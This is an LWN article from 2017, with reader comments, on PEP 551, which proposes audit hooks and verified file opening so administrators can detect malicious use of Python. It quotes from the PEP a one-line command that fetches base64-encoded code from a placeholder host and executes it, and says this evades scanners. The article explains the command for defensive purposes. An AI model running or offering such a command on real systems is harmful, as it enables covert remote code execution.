
Python security transparency

By Jake Edge
September 6, 2017

As Steve Dower noted in his lightning talk at the 2017 Python Language Summit, Python itself can be considered a security vulnerability: because of its power, its presence on a target system is a boon to attackers. Now, Dower is trying to address parts of that problem with a Python Enhancement Proposal (PEP) that would enable system administrators and others to detect when Python is being used for a nefarious purpose by increasing the "security transparency" of the language. It is not a solution that truly thwarts an attacker's ability to use Python in an unauthorized way, but it will make it easier for administrators to detect, and eventually disable, those kinds of attacks.

Threats

In PEP 551 (Security transparency in the Python runtime), Dower described the aim of the proposal: "The goals in order of increasing importance are to prevent malicious use of Python, to detect and report on malicious use, and most importantly to detect attempts to bypass detection." He also posted his first draft of the PEP to the Python security-sig mailing list. In the preface of that post, he gave a bit more detail on where the idea has come from and what it is meant to do:

This comes out of work we've been doing at Microsoft to balance the flexibility of scripting languages with their usefulness to malicious users. PowerShell in particular has had a lot of work done, and we've been doing the same internally for Python. Things like transcripting (log every piece of code when it is compiled) and signature validation (prevent loading unsigned code).

This PEP is about upstreaming enough functionality to make it easier to maintain these features - it is *not* intended to add specific security features to the core release. The aim is to be able to use a standard libpython3.7/python37.dll with a custom python3.7/python.exe that adds those features (listed in the PEP).

The kinds of attacks that PEP 551 seeks to address are advanced persistent threats (APTs) that make use of vulnerabilities of various sorts to establish a beachhead inside a network. Often Python is used from there to further the reach of the APT to other systems and networks, generally to extract data, but sometimes to damage data or hardware; Dower mentioned WannaCrypt (or WannaCry) and Stuxnet as examples of the latter. Python provides plenty for attackers to work with:

Python is a particularly interesting tool for attackers due to its prevalence on server and developer machines, its ability to execute arbitrary code provided as data (as opposed to native binaries), and its complete lack of internal logging. This allows attackers to download, decrypt, and execute malicious code with a single command:
    python -c "import urllib.request, base64;
               exec(base64.b64decode(urllib.request.urlopen(
                   'http://my-exploit/py.b64')).decode())"
This command currently bypasses most anti-malware scanners that rely on recognizable code being read through a network connection or being written to disk (base64 is often sufficient to bypass these checks). It also bypasses protections such as file access control lists or permissions (no file access occurs), approved application lists (assuming Python has been approved for other uses), and automated auditing or logging (assuming Python is allowed to access the internet or access another machine on the local network from which to obtain its payload).
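
The point about base64 defeating signature checks can be illustrated with a small, harmless sketch. The "scanner" here is a hypothetical substring match, far simpler than any real anti-malware product, and the payload is just an import statement; both are assumptions made for illustration.

```python
import base64

# Hypothetical byte pattern that a naive scanner might look for in transit
SIGNATURE = b"urllib.request"


def naive_scan(data):
    """Return True if the (hypothetical) signature appears in the raw bytes."""
    return SIGNATURE in data


payload = b"import urllib.request"      # harmless stand-in for real code
encoded = base64.b64encode(payload)     # what would travel over the network

print(naive_scan(payload))                      # plain text: pattern is visible
print(naive_scan(encoded))                      # encoded: pattern is hidden
print(naive_scan(base64.b64decode(encoded)))    # visible again only after decoding
```

The signature contains a ".", which is not part of the base64 alphabet, so it cannot appear in the encoded bytes. It only becomes visible again inside the interpreter, which is the place the proposed hooks would be able to observe it.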

New API

To combat the problem, Dower is proposing some additions to the Python API "to enable system administrators to integrate Python into their existing security systems, without dictating what those systems look like or how they should behave". There are two parts to the proposal: adding audit hooks that will be called from certain sensitive places within the Python runtime and standard library, and adding a way to intercept calls to open a file for execution (e.g. imports) to perform additional checks, such as permission or integrity checks, before the operation is performed.

For auditing, there would be calls added to the C and Python APIs to add an audit event to the stream or to add a callback that would be made when an event is generated. For C, it would look as follows:

    typedef int (*hook_func)(const char *event, PyObject *args);

    /* Add an auditing hook */
    int PySys_AddAuditHook(hook_func hook);

    /* Raise an event with all auditing hooks */
    int PySys_Audit(const char *event, PyObject *args);
There is also an internal cleanup function described (_Py_ClearAuditHooks()). Python code could access these capabilities using:
    # Add an auditing hook
    sys.addaudithook(hook: Callable[str, tuple]) -> None

    # Raise an event with all auditing hooks
    sys.audit(str, *args) -> None
Those are both taken from the PEP, which uses the type annotations for the Python code. As expected, addaudithook() takes a callable with effectively the same kinds of arguments (a string and tuple) as are passed to audit(). Both functions will return None.
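
As a rough sketch of how those two calls fit together, the following assumes an interpreter where sys.addaudithook() and sys.audit() are actually available (CPython 3.8 and later ship functions with these names). The event name "example.download" and its arguments are invented for illustration.

```python
import sys

recorded = []


def record_hook(event, args):
    # The hook receives the event name and a tuple of the event's arguments.
    # Only keep the made-up "example." events so the output stays readable.
    if event.startswith("example."):
        recorded.append((event, args))


sys.addaudithook(record_hook)

# Raise a (hypothetical) event; every registered hook is called with it
sys.audit("example.download", "http://host.invalid/payload", 42)

print(recorded)
# [('example.download', ('http://host.invalid/payload', 42))]
```

Note that the positional arguments given to sys.audit() arrive in the hook packed into a single tuple, which matches the "string and tuple" shape described above.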

CPython and the standard library would get calls to PySys_Audit() and sys.audit() in multiple locations, while audit hooks would be added by administrators. Multiple hooks can be added and they will be called in the order in which they were added; if a hook causes an exception, any further hooks are ignored and (normally) the Python runtime will exit.
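
The ordering and short-circuit behavior can be sketched as follows, again assuming a CPython release (3.8 or later) that provides sys.addaudithook() and sys.audit(). The "ordering." event names are hypothetical. In those releases the exception simply propagates to the caller of sys.audit(); whether the runtime then exits depends on where the event was raised.

```python
import sys

calls = []


def first_hook(event, args):
    if event.startswith("ordering."):
        calls.append("first")
        if event == "ordering.blocked":
            # Raising here prevents any later hook from seeing the event
            raise RuntimeError("policy violation: " + event)


def second_hook(event, args):
    if event.startswith("ordering."):
        calls.append("second")


sys.addaudithook(first_hook)
sys.addaudithook(second_hook)

sys.audit("ordering.allowed")
print(calls)            # ['first', 'second']

calls.clear()
try:
    sys.audit("ordering.blocked")
except RuntimeError as exc:
    print("stopped by:", exc)
print(calls)            # ['first']
```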

The second API addition allows administrators to add a verification step before Python opens a file for execution. A single verification handler can be registered from C:


    typedef PyObject *(*handler_func)(const char *narrow,
                                      const wchar_t *wide);

    /* Set the handler */
    int Py_SetOpenForExecuteHandler(handler_func handler);
The handler function will be passed the path of the file to be opened (in either narrow or wide format depending on the platform). The handler should do whatever verification it needs to do and return a file-like object that allows reading bytes, or raise an exception if the verification fails. Python code in the standard library that opens a file for execution will call:
    # Open a file using the handler
    os.open_for_exec(pathlike)
That function is a drop-in replacement for open(pathlike,'rb'), which opens the file for read-only, binary access. Since importlib will need to use open_for_exec() before os has been imported, there will be another version of it in the OS-specific nt and posix modules.
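
What a verification handler might do can be sketched in pure Python. The function name open_verified() and the SHA-256 allow list are hypothetical; the PEP leaves the actual policy to the administrator, and a real handler would be registered from C as shown above.

```python
import hashlib
import io
import os
import tempfile


def open_verified(path, allowed_digests):
    """Hypothetical handler: return a bytes reader only for allow-listed files."""
    with open(path, "rb") as f:
        data = f.read()
    digest = hashlib.sha256(data).hexdigest()
    if digest not in allowed_digests:
        raise PermissionError(f"{path}: digest {digest} is not on the allow list")
    # Return the bytes that were checked, so the file cannot be swapped
    # between verification and use.
    return io.BytesIO(data)


# Small demonstration with a throwaway file
with tempfile.TemporaryDirectory() as tmp:
    script = os.path.join(tmp, "job.py")
    source = b"print('hello')\n"
    with open(script, "wb") as f:
        f.write(source)

    trusted = {hashlib.sha256(source).hexdigest()}
    print(open_verified(script, trusted).read() == source)   # True

    try:
        open_verified(script, set())
    except PermissionError:
        print("rejected")
```

Returning an in-memory object rather than reopening the path is one possible design choice; it matches the requirement that the handler return "a file-like object that allows reading bytes".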

The PEP does note that it is easy for attackers' code to monkey patch importlib to remove the verification; auditing hooks should be used to detect and handle that case. In addition, there are other mechanisms that can be used to execute code that does not come directly from a file (e.g. compile(), exec()); auditing those will need to be part of any real solution.
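
Auditing code that never touches a file might look like the sketch below. It assumes a CPython release (3.8 or later) in which compile() and exec() raise audit events named "compile" (with the source and filename) and "exec" (with the code object); those names come from released CPython rather than from this article, and the "<audit-demo>" filename is made up.

```python
import sys

seen = []


def watch_dynamic_code(event, args):
    # Assumed shapes: "compile" carries (source, filename),
    # "exec" carries the code object about to run.
    if event == "compile" and len(args) >= 2 and args[1] == "<audit-demo>":
        seen.append("compile")
    elif event == "exec" and args and \
            getattr(args[0], "co_filename", None) == "<audit-demo>":
        seen.append("exec")


sys.addaudithook(watch_dynamic_code)

# Code that arrives as a string, never as a file on disk
code = compile("answer = 6 * 7", "<audit-demo>", "exec")
namespace = {}
exec(code, namespace)

print(seen, namespace["answer"])
```

A real hook would log or forward the source text itself, which is the "transcripting" idea mentioned earlier; this sketch only records that the events occurred.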

Those new APIs provide the means for an administrator to "look inside" the Python runtime but, in order to be effective, changes need to be made to the Python binary to enable the features. That's where the spython binary comes into play. Though the name is already undergoing some bikeshedding, the idea is to provide an example of a "restricted" Python binary that could be installed on production systems to try to detect or thwart APTs. Dower's GitHub repository that contains his current implementation of the APIs has the source for spython.c.

Recommendations

The PEP strongly recommends that administrators create their own version of the spython program that reflects local policies and priorities. The example program takes no arguments other than a script name and logs all audit events to a scriptname.log file. It restricts importable modules (to only .py files, which disallows using cached bytecode from .pyc files) and global name lookup for the pickle module. It also disallows any hooks being added after those it installs. Spython can be built in the Python source tree and will be used in the test suite, but it will not be shipped with python.org binary distributions; other distributions are expected to only ship it as an example or test binary.
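
One of those restrictions, limiting global name lookup for pickle, can be approximated from Python with an audit hook. This is a sketch and not how spython.c is written: it assumes a CPython release (3.8 or later) where unpickling raises a "pickle.find_class" event carrying the module and name, and the allow list is hypothetical.

```python
import pickle
import sys
from collections import OrderedDict
from fractions import Fraction

# Hypothetical local policy: the only globals that pickles may reference
ALLOWED_PICKLE_GLOBALS = {("collections", "OrderedDict")}


def restrict_pickle_globals(event, args):
    if event == "pickle.find_class":
        module, name = args
        if (module, name) not in ALLOWED_PICKLE_GLOBALS:
            raise pickle.UnpicklingError(
                f"global {module}.{name} is not allowed by policy")


sys.addaudithook(restrict_pickle_globals)

# An allow-listed type round-trips normally
print(pickle.loads(pickle.dumps(OrderedDict(a=1))))

# Anything else is refused while it is being unpickled
try:
    pickle.loads(pickle.dumps(Fraction(1, 2)))
except pickle.UnpicklingError as exc:
    print("blocked:", exc)
```

Because hooks cannot be removed once added, a policy like this stays in force for the rest of the process, which is the behavior the example binary relies on when it refuses further hooks.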

Overall, the idea is to give administrators a new level of control of the capabilities of the Python they install without having to hack the core Python code. Anecdotal evidence suggests that organizations are moving away from Python because it lacks a way to integrate the language with the other security features normally used on their systems. Installing Python becomes a liability in those environments, which makes administrators shy away from it.

The PEP comes with a set of recommendations to guide administrators on best practices for using the "security transparency" features it enables. For example:

The default python entry point should not be deployed to production machines, but could be given to developers to use and test Python on non-production machines. Sysadmins may consider deploying a less restrictive version of their entry point to developer machines, since any system connected to your network is a potential target. Sysadmins may deploy their own entry point as python to obscure the fact that extra auditing is being included.

Other recommendations include using the native auditing system rather than simply writing local files; not aborting the interpreter for abnormal events, since doing so encourages attackers to work around those features (detection is a higher priority than prevention); and correlating events that should happen together (e.g. import, followed by open_for_exec(), then compile) in order to detect attempts to bypass auditing. The PEP notes that the list is (necessarily) incomplete and that more recommendations may be added over time.
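
The correlation idea can be sketched as a pass over a recorded event stream. The (event, path) tuple format and the function name find_uncorrelated() are assumptions for illustration; a real deployment would do this in whatever system collects the audit logs.

```python
def find_uncorrelated(events):
    """Return paths that were compiled without first being opened for execution.

    `events` is an iterable of (event_name, path) pairs in the order they
    were logged; this format is hypothetical.
    """
    opened = set()
    suspicious = []
    for name, path in events:
        if name == "open_for_exec":
            opened.add(path)
        elif name == "compile" and path not in opened:
            suspicious.append(path)
    return suspicious


log = [
    ("import", "mod_a"),
    ("open_for_exec", "/lib/mod_a.py"),
    ("compile", "/lib/mod_a.py"),     # expected sequence for a normal import
    ("compile", "<string>"),          # compiled code with no matching open
]

print(find_uncorrelated(log))   # ['<string>']
```

A compile event with no preceding open is not proof of an attack, but it is the kind of gap in the expected sequence that the recommendation suggests looking for.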

So far, no real performance numbers have been gathered. The intent is for the feature to have minimal impact when it is not being used. Since it is an opt-in feature, though, the performance with hooks enabled is not really at issue (though one presumes it will be reasonably optimized). "Preliminary testing shows that calling sys.audit with no hooks added does not significantly affect any existing benchmarks, though targeted microbenchmarks can observe an impact." Another unfinished piece is to add more hook locations to the core and standard library.

Reception

The comments on the proposal have been fairly limited, but are quite favorable overall. There were some suggestions and thoughts in response to the first posting in the security-sig mailing list. The PEP was then updated and posted to python-dev for wider review. In the end, the PEP really only provides a way for administrators to look inside the interpreter; what they do with that ability is largely beyond its scope. But it does enable administrators to relatively easily do something they cannot do now.

There were concerns posted in both threads about circumventing the auditing (or forging audit events), but both of those are seen (by Dower, at least) as potential red flags for detecting the malicious activity. However, moving to a separate module (rather than using sys), as suggested by Nick Coghlan, was seen as making it too easy to replace the functionality. As Dower put it:

It's important to minimise the surface area of these features, and having the ability to disable auditing by shadowing/replacing a module is a little scary. At least when you replace sys you've got to do a bit of work to keep it a secret. (This is also the reasoning for using static variables internally rather than interpreter state - it's much harder to infer the address of a static C variable with pure Python code than a field in a struct.)

James Powell, who did a lot of initial research and implementation of the feature, also chimed in:

I'll add a little bit of detail. These aren't "security features"; they're "security transparency features." We acknowledge that we cannot block every malicious payload, but we should at least make it possible to audit interpreter state for post-mortem forensic purposes.

We wouldn't want it to be too easy to turn off these auditing features, and I've done a good amount of research into corrupting the running state of a CPython interpreter. Keeping things in builtin modules and in memory not directly exposed to the interpreter creates a real barrier to these techniques, and makes it meaningfully harder for an attacker to just disable the features at the start of their payload.

Adding the feature seems like a near no-brainer, unless some serious performance or other problems rear their head—not a likely outcome, seemingly. So far, there has been no reaction from Guido van Rossum, Python's benevolent dictator for life (BDFL), but he will ultimately either rule on it or appoint a BDFL-delegate to do so. It is quite plausible we will see PEP 551 delivered in Python 3.7, which is due in mid-2018.



Python security transparency

Posted Sep 6, 2017 21:21 UTC (Wed) by jhoblitt (subscriber, #77733) [Link] (5 responses)

Could someone provide an example of an "existing security system" that language runtimes other than Python are integrated with?

I would naively think that auditing syscalls or the network stack would be more robust than trying to instrument every runtime that might be on a system.

Python security transparency

Posted Sep 6, 2017 21:32 UTC (Wed) by fratti (subscriber, #105722) [Link]

This development is in direct response to sysadmins complaining that the Windows ability to not let any untrusted code run on the system was circumvented by PowerShell being on the system, which could execute arbitrary code. Microsoft correctly identified that this problem extends to other scripting runtimes. So I guess you'd have to ask sysadmins that do Windows-y Enterprise-y things about their particular systems, but it's definitely not a scare conjured up by Microsoft.

Python security transparency

Posted Sep 6, 2017 21:49 UTC (Wed) by mwsealey (subscriber, #71282) [Link] (2 responses)

From a naïve perspective you could say an "existing security system" is basically Windows Defender, in this case, or something very similar - it's providing firewall filtering and hooks system calls to look for viruses, so it has innate capability to try and intercept network traffic to make sure it's not malicious and to intercept file opens for the same reason.

Auditing syscalls and the network stack at the level it's at right now is really not as effective since there is no application context in place - a stream of bytes over a network connection has no link to "this will be passed to a language interpreter for execution", for example. At some level you can say "don't open connections to this domain or IP" or that a very well known attack signature should be filtered and blocked, but you can enable any transformation of data to elude that detection.

Hooks in Python so that it can filter the network traffic and look for signatures at the language level (therefore in context) and filter any files (after transformation, before it's directly executed!) opened for arbitrary execution to look for signatures, would be very useful.

One might deny any file opened for arbitrary code execution, or just any network URL, or just the ones that seemed to match particular known or heuristically-detected threats dependent on security policy of an organization just as I can prevent all my applications from working at all on Public networks vs. the domain network if I want to. And that's pretty much what PowerShell has available.

Python security transparency

Posted Sep 6, 2017 23:17 UTC (Wed) by jhoblitt (subscriber, #77733) [Link] (1 responses)

I'm not sure I follow the reasoning that syscall auditing doesn't have context. Surely even the Windows NT kernel knows which process is calling `connect(3)` (or the Windows equivalent)?

Python security transparency

Posted Sep 7, 2017 1:12 UTC (Thu) by Fowl (subscriber, #65667) [Link]

But logging that "Python Interpreter" accessed the network is less useful than "evil.py".

Python security transparency

Posted Sep 11, 2017 15:35 UTC (Mon) by BenHutchings (subscriber, #37955) [Link]


Copyright © 2017, Eklektix, Inc.
This article may be redistributed under the terms of the Creative Commons CC BY-SA 4.0 license
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds